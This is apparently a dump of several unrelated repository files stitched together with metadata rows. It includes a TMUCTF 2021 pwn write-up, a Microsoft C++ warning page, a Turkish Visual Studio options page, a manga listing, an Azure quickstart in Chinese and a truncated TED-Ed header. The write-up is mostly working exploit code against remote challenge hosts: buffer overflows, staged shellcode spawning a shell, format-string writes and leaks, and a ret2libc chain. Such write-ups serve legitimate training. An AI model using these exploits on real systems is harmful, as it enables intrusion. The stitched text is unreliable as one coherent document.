</div> | 31.866667 | 375 | 0.751046 | yue_Hant | 0.52354 |
61bff6ae62e35d1c26ecbdeef2a61d2b27397b4c | 12,571 | md | Markdown | _posts/tmuctf2021/2021-09-10-tmu-ctf-pwn.md | kirimoe/kirimoe.github.io | 28631b5754a6f7eae5959f0814f9f21529409d5f | [
"MIT"
] | null | null | null | _posts/tmuctf2021/2021-09-10-tmu-ctf-pwn.md | kirimoe/kirimoe.github.io | 28631b5754a6f7eae5959f0814f9f21529409d5f | [
"MIT"
] | null | null | null | _posts/tmuctf2021/2021-09-10-tmu-ctf-pwn.md | kirimoe/kirimoe.github.io | 28631b5754a6f7eae5959f0814f9f21529409d5f | [
"MIT"
] | 2 | 2021-09-17T20:15:48.000Z | 2021-09-17T21:59:39.000Z | ---
title: TMUCTF 2021 Pwn
tags: [tmuctf, ctf, writeup]
description: This is an exploit writeup for pwn challenges from tmuctf
---
# Tasks
* warmup
* babypwn
* areyouadmin
* canary
* security code
* fakesurvey
>You can download the challenges and exploits files <a href="https://github.com/kirimoe/tmuctf2021">from here</a>
# warmup
<img src="/assets/img/tmu/warmup.png">
This is an easy challenge all you have to do is to modify a varible on stack and
set it to non-zero send some A's to binary and you will get the flag.
<img src="/assets/img/tmu/warmup_sol.png">
Flag is <span style="color:red">`TMUCTF{n0w_y0u_4r3_w4rm3d_up}`</span>
# babypwn
<img src="/assets/img/tmu/babypwn.png">
This is a classical buffer overflow challenge with no mitigation involved all you have to do is overwrite the return address with address of function <span style="color:red">`wow`</span> and you will get the flag
```python
from pwn import *
p = ELF("./babypwn")
r = remote("194.5.207.56",7010)
offset = 0x28
payload = b"A"*offset
payload += p64(p.symbols['wow'])
r.recv()
r.sendline(payload)
print(r.recvall())
```
<br>
<img src="/assets/img/tmu/babypwn_sol.png">
Flag is <span style="color:red">`TMUCTF{w0w!_y0u_c0uld_f1nd_7h3_w0w!}`</span>
# areyouadmin
<img src="/assets/img/tmu/areyouadmin.png">
This was an interesting challenge cause it was the first time I used <font color="aqua">z3</font> with a pwn challenge. Okay so the challenge was fairly easy it just ask for a username and password and thats it.
The username is <span style="color:red">`AlexTheUser`</span> and password is <span style="color:red">`4l3x7h3p455w0rd`</span> you can easily find them using the string command.
But it will only give you the flag if bypass certain conditions like this,
<img src="/assets/img/tmu/condition.png">
These are the mathematical condtions where you have to guess the variables this is where <font color="aqua">z3</font> comes into the play. <font color="aqua">z3</font> or any sat solver takes certain condition and gives you the actual numbers like,
```
a + b = 5
a - b = 1
Then z3 will solve this for you and will give you the exact value for a and b
```
The variables are the location on stack set to 0 so all you have to do is overwrite these with correct value and you will get the flag. For this you can use either username or password field both are vulnerable to buffer overflow
```python
from pwn import *
from z3 import *
a,b,c,d,e = Int('a'),Int('b'),Int('c'),Int('d'),Int('e')
def val():
s = Solver()
s.add((a * b) + c == 0x253f)
s.add((b * c) + d == 0x37a2)
s.add((c * d) + e == 0x16d3)
s.add((d * e) + a == 0x1bc9)
s.add((e * a) + b == 0x703f)
s.check()
return s.model()
l = val()
flag = False
offset = 0x60 - 0x14
username = b"AlexTheUser\x00"
password = b"4l3x7h3p455w0rd"
payload = b""
payload += username
payload += b"A" * (offset - len(username))
payload += p32(l[e].as_long())
payload += p32(l[d].as_long())
payload += p32(l[c].as_long())
payload += p32(l[b].as_long())
payload += p32(l[a].as_long())
payload2 = b""
payload2 += password
if flag:
p = process("./areyouadmin")
else:
p = remote("194.5.207.113",7020)
p.recv()
p.sendline(payload)
p.recv()
p.sendline(payload2)
print(p.recvall())
```
<br>
<img src="/assets/img/tmu/areyouadmin_sol.png">
Flag is <span style="color:red">`TMUCTF{7h3_6375_func710n_15_d4n63r0u5_4nd_5h0uld_n07_b3_u53d}`</span>
# canary
<img src="/assets/img/tmu/canary.png">
This challenge was interesting it accepts two string and tells us if they are equal or not additionally it asks for phone number at end using this field we can overwrite return address. By using checksec we can see it has an executable stack.
The challenge also provides us with address of canary
**Leaked Canary Address + 12 = Address of String1**
The challenge doesn't have an actual stack canary but a dummy value placed between our string1 and string2.
The reason it says you cannot inject shellcode because both strings only accepts input upto 15 character.
In short its a <span style="color:red">shellcoding challenge</span> with a small buffer.
Exploit is simple we have to use a stage 1 shellcode which will read our stage 2 (main) shellcode.
```python
from pwn import *
context.arch = 'amd64'
flag = False
if flag:
p = process("./canary")
else:
p = remote("194.5.207.113",7030)
def stage1():
stage1_shellcode = asm('''
xor eax,eax
xor edi,edi
mov rsi,rsp
mov dl,100
syscall
jmp rsp
''')
p.recv()
p.sendline(stage1_shellcode)
p.recv()
p.sendline(b"Mikey-kun")
p.recvuntil(b"address: ")
ret = int(p.recv(14),16)+12
log.info("Return Address : " + hex(ret))
p.recv()
p.sendline(b"BAJI"*5 + p64(ret))
def stage2():
stage2_shellcode = asm('''
mov rbx,0x0068732f6e69622f
push rbx
mov rdi,rsp
xor esi,esi
xor edx,edx
xor eax,eax
mov al,59
syscall
''')
p.send(stage2_shellcode)
p.interactive()
stage1()
stage2()
```
<br>
<img src="/assets/img/tmu/canary_sol.png">
Flag is <span style="color:red">`TMUCTF{3x3cu74bl3_574ck_15_v3ry_d4n63r0u5}`</span>
# security code
<img src="/assets/img/tmu/security_code.png">
Can you print the flag??????????? 🤣 the reason why it say this cause even if you exploit the vulnerability you will find it 🤔 why it isn't printing my flag. Lets take a look
when you execute the binary it asks for whether we want to be an admin or a user if we say admin it asks for our name and says `hello our dear admin, name_we_entered`
As soon as our name gets reflected I go for format specifiers like %p %x and indeed it was a <span style="color:red">`format string vulnerability`</span> cause it started printing values on stack.
Please note this is an 32 bit executable so not that hard
<img src="/assets/img/tmu/seccode.png">
As you can see we have to modify that <span style="color:red">`security_code`</span> variable to <span style="color:red">`0xabadcafe`</span> which was set to 0 by default.
So how do we do that, well the <span style="color:red">`%n modifier`</span> will write the data to a pointer provided before it.
Just refer this pdf and you will get it <a href="https://web.ecs.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf">Format String (Click Here)</a>
```python
seccode = 0x0804c03c
def pad(s):
return s+b"x"*(1023-len(s))
payload = b""
payload += p32(seccode)
payload += p32(seccode+1)
payload += p32(seccode+2)
payload += p32(seccode+3)
payload += b"%238x%15$hhn"
payload += b"%204x%16$hhn"
payload += b"%227x%17$hhn"
payload += b"%254x%18$hhn"
exp = pad(payload)
```
This will set the <span style="color:red">`security_code`</span> to <span style="color:red">`0xabadcafe`</span> and will call the function <span style="color:red">`auth_admin`</span>
Now the <span style="color:red">`auth_admin`</span> will open the flag and ask for a password and simply prints out the password nothin else BUTTTTTTT!! if the password is also reflecting that means YEP you guessed it its format string vulnerable too
we know our flag will also gonna be on stack we can leak it out.
BUTTT heres a twist the password field accepts only 5 characters then how we can leak flag if we can only leak first two values right <span style="color:red">`%p %p`</span> thats where <span style="color:red">`$`</span> comes in handy.
The <span style="color:red">`$`</span> allows us access any value on stack for example if we wants to access the 4th value on stack we can do something like this <span style="color:red">`%4$x`</span>
Our flag starts at the 7th offset so thats it we have to execute our exploit multiple times and increment the offset value and we will get the entire flag <font color="red">easy_peasy</font>
```python
def leak_flag(n):
flag = b""
while b"}" not in flag:
if isremote:
p = remote("185.235.41.205",7040)
else:
p = process("./securitycode")
p.recv()
p.sendline("A")
p.recv()
p.send(exp)
modifier = "%"+str(n)+"$p"
p.sendline(modifier)
p.recvuntil(b"password is ")
flag += p64(int(p.recv(10),16))
n+=1
return flag.replace(b'\x00',b'')
flag = leak_flag(7)
print(flag)
```
<br><img src="/assets/img/tmu/security_code_sol.png">
Flag is <span style="color:red">`TMUCTF{50_y0u_kn0w_50m37h1n6_4b0u7_f0rm47_57r1n6_0xf7e11340}`</span>
# fakesurvey
<img src="/assets/img/tmu/fakesurvey.png">
This challenge showcases two vulnerabilities one is format string and other is buffer overflow. By analyzing the binary we find out that its an 32 bit executable.
When we execute the binary it first ask for the password. The password is stored in a file name <span style="color:red">`passPhrase`</span> so it opens the file and check if the password we entered is equal to the password in the passPhrase file. The password field accept input of 15 characters and is vulnerable to format string.
Remember what I said previously that it opens the file for password comparison so just like the previous challenge we can leak out the password using format string. The password starts at the 8th value on stack
```python
def leak_passphrase():
p = remote("185.235.41.205",7050)
p.recv()
p.sendline(b"%8$llx %9$llx")
p.recvuntil(b"Your password is ")
l = p.recv()[:-1].split(b" ")
p.close()
password = b""
for i in l:
password += p64(int(i,16))
return password
```
when you enter the correct password it then ask for your name and exits thats it. But the name field has a buffer overflow so where we have to return I mean theres isn't a specific function which will print out the flag.
So I guess we have to do <span style="color:red">`ret2libc`</span> attack. so we basically has to call <span style="color:red">`system("/bin/sh")`</span> and how we gonna do that cause we don't know the address of system also the system has <span style="color:red">`ASLR`</span> enabled.
Heres the exploit we first gonna use <span style="color:red">`ret2puts`</span> this sounds funny but we are gonna use the <span style="color:red">`puts`</span> to leak out the address of <span style="color:red">`puts`</span> and once we have address of puts we can then calculate other offsets such as system and binsh.
Theres this thing called <span style="color:red">`libc database`</span> which can help you to find the libc version if you provide it with at least single address of any function in our case its gonna be puts.
```diff
- Why we need a libc database?
Cause we dont know which version of libc remote server is using
```
then as the return address for the ret2puts we use the address of <span style="color:red">`main()`</span>
```python
def leak_libc_base():
payload = b"A"*76
payload += p32(binary.plt['puts'])
payload += p32(binary.symbols['main'])
payload += p32(binary.got['puts'])
p.recv()
p.recv()
p.sendline(passphrase)
p.recv()
p.recv()
p.sendline(payload)
p.recvuntil(b"***\n")
leak = u32(p.recv(4))
log.info("puts libc leaked address : " + hex(leak))
libc_base = leak - libc.symbols['puts']
log.info("libc base address : " + hex(libc_base))
return libc_base
```
Now we can calculate address to <span style="color:red">`system`</span> and <span style="color:red">`binsh`</span> and this time we are going to call <span style="color:red">`system("/bin/sh")`</span>
```
Exploit = [padding][puts.plt][main][puts.got]
Exploit2 = [padding][system][put_anythin_here_as_ret_address][binsh]
```
```python
def get_shell(libc_base):
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
payload = b"A"*76
payload += p32(system)
payload += b"CCCC"
payload += p32(binsh)
p.recv()
p.sendline(passphrase)
p.recv()
p.recv()
p.send(payload)
p.interactive()
```
<img src="/assets/img/tmu/fakesurvey_sol.png">
flag is <span style="color:red">`TMUCTF{m4yb3_y0u_u53d_7h3_574ck_4nd_r37urn3d_70_dl_r350lv3`</span>
>You can download the challenges and exploits files <a href="https://github.com/kirimoe/tmuctf2021">from here</a>
| 34.253406 | 331 | 0.679819 | eng_Latn | 0.972752 |
61c0314a03977b5b5a1f0b65b00231e886fdd321 | 1,849 | md | Markdown | docs/error-messages/compiler-warnings/compiler-warning-level-1-c4532.md | asklar/cpp-docs | c5e30ee9c63ab4d88b4853acfb6f084cdddb171f | [
"CC-BY-4.0",
"MIT"
] | 14 | 2018-01-28T18:10:55.000Z | 2021-11-16T13:21:18.000Z | docs/error-messages/compiler-warnings/compiler-warning-level-1-c4532.md | asklar/cpp-docs | c5e30ee9c63ab4d88b4853acfb6f084cdddb171f | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/error-messages/compiler-warnings/compiler-warning-level-1-c4532.md | asklar/cpp-docs | c5e30ee9c63ab4d88b4853acfb6f084cdddb171f | [
"CC-BY-4.0",
"MIT"
] | 2 | 2018-11-01T12:33:08.000Z | 2021-11-16T13:21:19.000Z | ---
title: "Compiler Warning (level 1) C4532 | Microsoft Docs"
ms.custom: ""
ms.date: "11/04/2016"
ms.reviewer: ""
ms.suite: ""
ms.technology: ["cpp-tools"]
ms.tgt_pltfrm: ""
ms.topic: "error-reference"
f1_keywords: ["C4532"]
dev_langs: ["C++"]
helpviewer_keywords: ["C4532"]
ms.assetid: 4e2a286a-d233-4106-9f65-29be1a94ca02
caps.latest.revision: 9
author: "corob-msft"
ms.author: "corob"
manager: "ghogen"
---
# Compiler Warning (level 1) C4532
'continue' : jump out of __finally/finally block has undefined behavior during termination handling
The compiler encountered one of the following keywords:
- [continue](../../cpp/continue-statement-cpp.md)
- [break](../../cpp/break-statement-cpp.md)
- [goto](../../cpp/goto-statement-cpp.md)
causing a jump out of a [__finally](../../cpp/try-finally-statement.md) or [finally](../../dotnet/finally.md) block during abnormal termination.
If an exception occurs, and while the stack is being unwound during execution of the termination handlers (the `__finally` or finally blocks), and your code jumps out of a `__finally` block before the `__finally` block ends, the behavior is undefined. Control may not return to the unwinding code, so the exception may not be handled properly.
If you must jump out of a **__finally** block, check for abnormal termination first.
The following sample generates C4532; simply comment out the jump statements to resolve the warnings.
```
// C4532.cpp
// compile with: /W1
// C4532 expected
int main() {
int i;
for (i = 0; i < 10; i++) {
__try {
} __finally {
// Delete the following line to resolve.
continue;
}
__try {
} __finally {
// Delete the following line to resolve.
break;
}
}
}
``` | 31.87931 | 346 | 0.656571 | eng_Latn | 0.968492 |
61c084244ad940c3a15d03400d18b5986a139519 | 2,507 | md | Markdown | c1/README.md | abrantesasf/faesa_web2 | 2c9ccf5655a5477d65dd7d34cadf46ad6bcf6066 | [
"MIT"
] | null | null | null | c1/README.md | abrantesasf/faesa_web2 | 2c9ccf5655a5477d65dd7d34cadf46ad6bcf6066 | [
"MIT"
] | null | null | null | c1/README.md | abrantesasf/faesa_web2 | 2c9ccf5655a5477d65dd7d34cadf46ad6bcf6066 | [
"MIT"
] | null | null | null | # Avaliação C1
Este é meu repositório para o projeto de desenvolvimento da **Avaliação
C1**.
## Pré-requisitos para rodar o projeto:
- Você deve ter o Docker e o Docker Compose (versões recentes) instalados;
- De preferência com sistema operacional Linux.
**Atenção**: se você não estiver usando Linux, terá que comentar a seção
do **Portainer** no arquivo `docker-compose.yml`, pois está configurado
para rodar em Linux. Veja instruções a seguir.
## Como rodar o projeto:
- Faça o download do diretório `c1` e de todo o seu conteúdo (ou faça
um clone deste repositório inteiro);
- Dentro do diretório `c1/backend` existe um arquivo para o Docker
Compose, o `docker-compose.yml`. Dê uma olhada nesse arquivo e:
- Verifique se as portas utilizadas não causarão conflito com
alguma porta já em uso no seu computador. As portas que estão
configuradas são:
- 27017 (para o MongoDB)
- 8081 (para o Mondo-Express)
- 8080 (para o Adminer)
- 3005 (para o Node)
- 9000 e 8000 (para o Portainer)
- Se você está usando Linux, não precisa fazer mais nada.
- Se você está usando Windows, precisará configurar o
Portainer, pois está configurado para Linux. Como o
Portainer não é necessário para este projeto, você pode
até comentar todo esse serviço.
- Depois que você verificar as portas e o Portainer, abra um shell,
vá para o direótio `c1/backend` e execute o comando: **`docker-compose up -d`**
- Esse comando fará o download das imagens necessárias, construirá
os containers (com as redes e volumes adequados) e, se tudo correr bem,
você pode acessar a aplicação.
- Em execuções posteriores basta fazer `docker-compose start` e
`docker-compose stop`.
## Como acessar a aplicação:
Como esta aplicação é só a API de backend, todas as interações (GET, POST, PUT, DELETE)
devem ser feitas através de arquivos JSON, com o uso do Portman ou do Insomnia.
Para requisições GET, o browser serve:
* http://localhost:3005 (raiz da aplicação)
* http://localhost:3005/api/unidades (API de unidades de saúde)
* http://localhost:3005/api/pessoas (API de pessoas usuárias das unidades de saúde)
* http://localhost:3005/api/agendamentos (API de agendamentos)
Se desejar, pode acessar o Mongo-Express para verificar o que está sendo
armazenado no MongoDB: http://localhost:8081
## Banco de dados:
Pelos requisitos da avaliação deveríamos utilizar o MongoDB. Ocorre que
ele é um banco NoSQL e, para a aplicação solicitada, o melhor seria
um, banco SQL mesmo.
| 43.982456 | 88 | 0.746709 | por_Latn | 0.99992 |
61c0f30bd5fa68e023836a6d6ee36d93b1246987 | 60 | md | Markdown | README.md | jhonathancs/Certificado-Digital-Innovation-One | 2d06ae7c3c030f3de59cdd832cde8eb13690d289 | [
"MIT"
] | null | null | null | README.md | jhonathancs/Certificado-Digital-Innovation-One | 2d06ae7c3c030f3de59cdd832cde8eb13690d289 | [
"MIT"
] | null | null | null | README.md | jhonathancs/Certificado-Digital-Innovation-One | 2d06ae7c3c030f3de59cdd832cde8eb13690d289 | [
"MIT"
] | null | null | null | # Certificado-Digital-Innovation-One
todos os certificados
| 20 | 36 | 0.833333 | por_Latn | 0.570216 |
61c14c849c02635cc8191882c78346e9bd1a180f | 4,516 | md | Markdown | docs/vs-2015/ide/reference/options-text-editor-c-cpp-formatting.md | seferciogluecce/visualstudio-docs.tr-tr | 222704fc7d0e32183a44e7e0c94f11ea4cf54a33 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/ide/reference/options-text-editor-c-cpp-formatting.md | seferciogluecce/visualstudio-docs.tr-tr | 222704fc7d0e32183a44e7e0c94f11ea4cf54a33 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/ide/reference/options-text-editor-c-cpp-formatting.md | seferciogluecce/visualstudio-docs.tr-tr | 222704fc7d0e32183a44e7e0c94f11ea4cf54a33 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Seçenekler, metin düzenleyici, C / C++, biçimlendirme | Microsoft Docs
ms.custom: ''
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.reviewer: ''
ms.suite: ''
ms.technology:
- vs-ide-general
ms.tgt_pltfrm: ''
ms.topic: article
f1_keywords:
- VS.ToolsOptionsPages.Text_Editor.C/C++.Formatting.General
- VS.ToolsOptionsPages.Text_Editor.C%2fC%2b%2b.Formatting.General
dev_langs:
- C++
helpviewer_keywords:
- Text Editor Options dialog box, formatting
ms.assetid: cb6f1cbb-5305-48da-a8e8-33fd70775d46
caps.latest.revision: 20
author: gewarren
ms.author: gewarren
manager: ghogen
ms.openlocfilehash: a8589696e669c83b65951d81d155033d45533710
ms.sourcegitcommit: 9ceaf69568d61023868ced59108ae4dd46f720ab
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 10/12/2018
ms.locfileid: "49237009"
---
# <a name="options-text-editor-cc-formatting"></a>Seçenekler, Metin Düzenleyici, C/C++, Biçimlendirme
[!INCLUDE[vs2017banner](../../includes/vs2017banner.md)]
C veya C++ ortamında programlama yaparken Kod Düzenleyicisi'nin varsayılan davranışını değiştirmenizi sağlar.
Bu sayfaya erişmek için **seçenekleri** iletişim kutusunda, sol bölmede, **metin düzenleyici**, genişletme **C/C++** ve ardından **biçimlendirme** .
> [!NOTE]
> Bilgisayarınız, aşağıdaki yönergelerde yer alan Visual Studio kullanıcı arabirimi öğelerinden bazıları için farklı adlar veya konumlar gösterebilir. Sahip olduğunuz Visual Studio sürümü ve kullandığınız ayarlar bu öğeleri belirler. Daha fazla bilgi için [Visual Studio'da geliştirme ayarlarını özelleştirme](http://msdn.microsoft.com/en-us/22c4debb-4e31-47a8-8f19-16f328d7dcd3).
## <a name="cc-options"></a>C/C++ Seçenekleri
**Otomatik hızlı bilgi araç ipuçlarını etkinleştir**
Hızlı Bilgi IntelliSense özelliğini etkinleştirir ya da devre dışı bırakır.
## <a name="inactive-code"></a>Pasif Kod
**Pasif kod bloklarını göster**
Şu nedenle etkin olmayan kod `#ifdef` bildirimleri farklı renklendirilir tanımanıza yardımcı olacak.
**Pasif kod Donukluğunu devre dışı bırak**
Pasif kod saydamlık yerine renk kullanılarak tanımlanabilir.
**Pasif kod donukluk yüzdesi**
Pasif kod blokları için donukluk derecesi özelleştirilebilir.
## <a name="indentation"></a>Girinti
**Küme ayraçlarını Girintile**
Örneğin, bir işlev bir kod bloğuna başladıktan sonra veya ENTER tuşuna bastığınızda ayraçların hizalanma şeklini yapılandırabilirsiniz `for` döngü. Ayraçlar, kod bloğunun ilk karakteriyle hizalanabilir ya da girintili yapılabilir.
**Sekme üzerinde otomatik girintili yazma**
SEKME tuşuna bastığınızda geçerli kod satırında ne olacağını yapılandırabilirsiniz. Satır girintili yapılır ya da sekme eklenir.
## <a name="miscellaneous"></a>Çeşitli
**Görev Listesi penceresindeki açıklamaları numaralandır**
Düzenleyici, açık kaynak dosyalarını açıklamalardaki önceden ayarlı sözcükler için tarayabilir. Bir giriş oluşturur **görev listesi** bulduğu her anahtar sözcük penceresi.
**Eşleşen göstergeleri vurgulama**
İmleç bir ayracın yanında olduğunda, düzenleyici eşleşen ayracı vurgulayarak içindeki kodu daha kolay görmenizi sağlayabilir.
## <a name="outlining"></a>Anahat Oluşturma
**Dosyalar açıldığında anahat moduna gir**
Bir dosyayı metin düzenleyicisine getirdiğinizde, anahat oluşturma özelliğini etkinleştirebilirsiniz. Daha fazla bilgi için [anahat](../../ide/outlining.md). Bu seçenek belirtildiğinde, bir dosyayı açtığınızda anahat oluşturma özelliği etkinleştirilir.
**#Pragma bölge bloklarının otomatik anahatlandırma başlatır**
Bu seçenek, seçilen, için otomatik anahat oluşturma [pragma yönergeleri](http://msdn.microsoft.com/library/9867b438-ac64-4e10-973f-c3955209873f) etkinleştirilir. Bu, anahat modunda pragma bölge bloklarını genişletmenize veya daraltmanıza imkan tanır.
**Deyim bloklarının otomatik anahatlandırma başlatır**
Bu seçenek belirtildiğinde, aşağıdaki deyim yapıları için otomatik anahat oluşturma etkin olur.
- [if-else](http://msdn.microsoft.com/library/d9a1d562-8cf5-4bd4-9ba7-8ad970cd25b2)
- [switch Deyimi (C++)](http://msdn.microsoft.com/library/6c3f3ed3-5593-463c-8f4b-b33742b455c6)
- [while Deyimi (C++)](http://msdn.microsoft.com/library/358dbe76-5e5e-4af5-b575-c2293c636899)
## <a name="see-also"></a>Ayrıca Bkz.
[Genel, ortam, Seçenekler iletişim kutusu](../../ide/reference/general-environment-options-dialog-box.md)
[IntelliSense Kullanma](../../ide/using-intellisense.md)
| 49.086957 | 383 | 0.773915 | tur_Latn | 0.998708 |
61c17c196685e843132863ac2d42bd3152d78352 | 955 | md | Markdown | catalog/zankoku-na-sankoku/en-US_zankoku-na-sankoku.md | htron-dev/baka-db | cb6e907a5c53113275da271631698cd3b35c9589 | [
"MIT"
] | 3 | 2021-08-12T20:02:29.000Z | 2021-09-05T05:03:32.000Z | catalog/zankoku-na-sankoku/en-US_zankoku-na-sankoku.md | zzhenryquezz/baka-db | da8f54a87191a53a7fca54b0775b3c00f99d2531 | [
"MIT"
] | 8 | 2021-07-20T00:44:48.000Z | 2021-09-22T18:44:04.000Z | catalog/zankoku-na-sankoku/en-US_zankoku-na-sankoku.md | zzhenryquezz/baka-db | da8f54a87191a53a7fca54b0775b3c00f99d2531 | [
"MIT"
] | 2 | 2021-07-19T01:38:25.000Z | 2021-07-29T08:10:29.000Z | # Zankoku na Sankoku

- **type**: manga
- **volumes**: 1
- **original-name**: 残酷な再会
- **start-date**: 2008-01-20
## Tags
- romance
- josei
## Authors
- Kobayashi
- Hiromi (Art)
- Williams
- Cathy (Story)
## Sinopse
Laura and Gabriel were passionately in love - even though she was the daughter of a wealthy family, while he was a mere stable boy. But when Laura's parents reject the penniless Gabriel's proposal to marry their daughter, he disappears in despair. 7 years later, Laura is burdened by huge debts left by her late parents when Gabriel, now a successful and wealthy investor, appears before her. He is not the man she used to know, as he coldly declares: "I bet you never thought this day would come. When our positions are reversed!"
(Source: eManga)
## Links
- [My Anime list](https://myanimelist.net/manga/41391/Zankoku_na_Sankoku)
| 30.806452 | 531 | 0.719372 | eng_Latn | 0.993168 |
61c1c50330550f8bbf4ec3114c160137ae2597e6 | 4,534 | md | Markdown | articles/cognitive-services/cognitive-services-apis-create-account.md | allanfann/azure-docs.zh-tw | c66e7b6d1ba48add6023a4c08cc54085e3286aa3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cognitive-services/cognitive-services-apis-create-account.md | allanfann/azure-docs.zh-tw | c66e7b6d1ba48add6023a4c08cc54085e3286aa3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cognitive-services/cognitive-services-apis-create-account.md | allanfann/azure-docs.zh-tw | c66e7b6d1ba48add6023a4c08cc54085e3286aa3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 在 Azure 入口網站中建立認知服務帳戶
titlesuffix: Azure Cognitive Services
description: 如何在 Azure 入口網站中建立的 Azure 認知服務 Api 帳戶。
services: cognitive-services
author: garyericson
manager: nitinme
ms.service: cognitive-services
ms.topic: conceptual
ms.date: 03/26/2019
ms.author: garye
ms.openlocfilehash: 6950cba5ac958233e7ea77c8dc783ca86cc5a386
ms.sourcegitcommit: 6da4959d3a1ffcd8a781b709578668471ec6bf1b
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 03/27/2019
ms.locfileid: "58519879"
---
# <a name="quickstart-create-a-cognitive-services-account-in-the-azure-portal"></a>快速入門:在 Azure 入口網站中建立認知服務帳戶
在本快速入門中,您將了解如何註冊 Azure 認知服務,並建立單一服務或多服務訂用帳戶。 這些服務都是由 Azure [資源](https://docs.microsoft.com/azure/azure-resource-manager/resource-group-portal)的形式呈現,可讓您連線到 Azure 認知服務 API 中的一個或多個 API。
## <a name="prerequisites"></a>必要條件
* 有效的 Azure 訂用帳戶。 免費[建立帳戶](https://azure.microsoft.com/free/)。
## <a name="create-and-subscribe-to-an-azure-cognitive-services-resource"></a>建立並訂閱 Azure 認知服務資源
開始之前,請務必注意有兩種類型的 Azure 認知服務訂用帳戶。 第一個是單一服務訂用帳戶,例如電腦視覺或語音服務。 單一服務訂用帳戶僅限於該資源。 第二個是 Azure 認知服務的多服務訂用帳戶。 此訂用帳戶可讓您使用適用於大部分 Azure 認知服務的單一訂用帳戶。 此選項也會合併計費。 如需其他資訊,請參閱[認知服務定價](https://azure.microsoft.com/pricing/details/cognitive-services/)。
>[!WARNING]
> 目前,以下服務**不**支援多服務金鑰:QnA Maker、 語音服務、 自訂的視覺和異常偵測器。
下一節會引導您建立單一或多服務訂用帳戶。
### <a name="multi-service-subscription"></a>多服務訂用帳戶
1. 登入 [Azure 入口網站](https://portal.azure.com),然後按一下 [+ 建立資源]。

2. 找到搜尋列,然後輸入:**認知服務**。

3. 選取 [認知服務]。
![選取 [認知服務]](media/cognitive-services-apis-create-account/azureMarketplaceMulti.png)
3. 在 [建立] 頁面上,提供下列資訊:
| | |
|--|--|
| **名稱** | 認知服務資源的描述性名稱。 我們建議使用描述性的名稱,例如 MyCognitiveServicesAccount。 |
| **訂用帳戶** | 選取您其中一個可用的 Azure 訂用帳戶。 |
| **位置** | 您的認知服務執行個體的位置。 位置不同可能會造成延遲,但不會影響您資源執行階段的可用性。 |
| **定價層** | 認知服務帳戶的費用取決於您選擇的選項和使用方式。 如需詳細資訊,請參閱 API [定價詳細資料](https://azure.microsoft.com/pricing/details/cognitive-services/)。
| **資源群組** | [Azure 資源群組](https://docs.microsoft.com/azure/architecture/cloud-adoption/getting-started/azure-resource-access#what-is-an-azure-resource-group),將包含您的認知服務資源。 您可以建立新的群組,或將群組新增到既有的群組。 |

### <a name="single-service-subscription"></a>單一服務訂用帳戶
1. 登入 [Azure 入口網站](https://portal.azure.com),然後按一下 [+ 建立資源]。

2. 在 [Azure Marketplace] 底下,選取 [AI + 機器學習服務]。 如果您沒看到感興趣的服務,請按一下 [查看全部],即可檢視認知服務 API 的完整目錄。

3. 在 [建立] 頁面上,提供下列資訊:
| | |
|--|--|
| **名稱** | 認知服務資源的描述性名稱。 我們建議使用描述性的名稱,例如 *MyNameFaceAPIAccount*。 |
| **訂用帳戶** | 選取您其中一個可用的 Azure 訂用帳戶。 |
| **位置** | 您的認知服務執行個體的位置。 位置不同可能會造成延遲,但不會影響您資源執行階段的可用性。 |
| **定價層** | 認知服務帳戶的費用取決於您選擇的選項和使用方式。 如需詳細資訊,請參閱 API [定價詳細資料](https://azure.microsoft.com/pricing/details/cognitive-services/)。
| **資源群組** | [Azure 資源群組](https://docs.microsoft.com/azure/architecture/cloud-adoption/getting-started/azure-resource-access#what-is-an-azure-resource-group),將包含您的認知服務資源。 您可以建立新的群組,或將群組新增到既有的群組。 |

## <a name="access-your-resource"></a>存取您的資源
> [!NOTE]
> 訂用帳戶擁有者可以藉由套用 [Azure 原則](https://docs.microsoft.com/azure/governance/policy/overview#policy-definition)、指派「不允許的資源類型」原則定義,以及指定 **Microsoft.CognitiveServices/accounts** 作為目標資源類型,針對資源群組或訂用帳戶停用認知服務帳戶的建立。
建立資源後,如果有釘選該資源,就可以在 Azure 儀表板上直接存取。 若未釘選,可以在 [資源群組]中找到。
在認知服務資源中,您可以使用 [概觀] 區段中的端點 URL 和金鑰,開始在應用程式中進行 API 呼叫。

## <a name="next-steps"></a>後續步驟
> [!div class="nextstepaction"]
> [驗證 Azure 認知服務要求](authentication.md)
## <a name="see-also"></a>請參閱
* [快速入門:從影像擷取手寫文字](https://docs.microsoft.com/azure/cognitive-services/computer-vision/quickstarts/csharp-hand-text)
* [教學課程:建立應用程式來偵測並框出影像中的臉部](https://docs.microsoft.com/azure/cognitive-services/Face/Tutorials/FaceAPIinCSharpTutorial)
* [建置自訂搜尋網頁](https://docs.microsoft.com/azure/cognitive-services/bing-custom-search/tutorials/custom-search-web-page)
* [使用 Bot Framework 整合 Language Understanding (LUIS) 和 Bot](https://docs.microsoft.com/azure/cognitive-services/luis/luis-nodejs-tutorial-build-bot-framework-sample)
| 42.373832 | 231 | 0.751875 | yue_Hant | 0.904521 |
61c1c819c920e873fdb836780cce5a3bc9311d36 | 3,734 | md | Markdown | TEDed/Titles_starting_P_to_Z/The_coelacanth_A_living_fossil_of_a_fish_Erin_Eastwood.md | gt-big-data/TEDVis | 328a4c62e3a05c943b2a303817601aebf198c1aa | [
"MIT"
] | 91 | 2018-01-24T12:54:48.000Z | 2022-03-07T21:03:43.000Z | cleaned_teded_data/Titles_starting_P_to_Z/The_coelacanth_A_living_fossil_of_a_fish_Erin_Eastwood.md | nadaataiyab/TED-Talks-Nutrition-NLP | 4d7e8c2155e12cb34ab8da993dee0700a6775ff9 | [
"MIT"
